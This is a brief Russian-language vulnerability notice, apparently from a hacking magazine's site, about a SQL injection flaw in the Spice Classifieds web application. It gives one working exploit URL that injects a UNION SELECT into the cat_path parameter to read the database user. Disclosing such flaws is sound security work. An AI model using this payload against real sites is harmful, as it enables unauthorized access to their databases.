Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Программа: Spice Classifieds
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения.
Эксплоит:
www.site.me/patch/index.php?cat_path=-99999+union+select+0,user(),2,3/